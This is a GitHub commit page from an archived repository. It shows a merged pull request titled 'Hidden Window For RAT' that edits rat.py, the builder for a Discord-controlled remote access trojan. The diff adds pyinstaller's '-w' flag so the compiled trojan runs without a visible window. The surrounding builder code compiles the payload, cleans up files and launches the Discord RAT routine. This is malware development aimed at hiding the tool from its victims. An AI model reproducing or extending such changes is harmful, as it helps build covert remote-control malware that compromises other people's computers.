Skip to content
This repository was archived by the owner on Feb 11, 2025. It is now read-only.

Commit 6fe223f

Browse files
authored
Merge pull request #21 from nomrsavage/patch-1
Hidden Window For RAT
2 parents 63aa8ce + 14e660e commit 6fe223f

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

Additional_File/2_Rat/rat.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1226,7 +1226,7 @@ def shell():
12261226
os.system('cls' if os.name == 'nt' else 'clear')
12271227
print(f'{y}[{b}#{y}]{w} File creation...')
12281228
time.sleep(1)
1229-
os.system(f"pyinstaller -y -F temp/{fileName}.py")
1229+
os.system(f"pyinstaller -y -F -w temp/{fileName}.py")
12301230
os.system('cls' if os.name == 'nt' else 'clear')
12311231
print(f'{y}[{b}#{y}]{w} Cleaning up old files...')
12321232
time.sleep(1)
@@ -1247,4 +1247,4 @@ def shell():
12471247
input(f"{y}[{b}#{y}]{w} Press ENTER to exit")
12481248
main()
12491249

1250-
discordrat()
1250+
discordrat()

0 commit comments

Comments
 (0)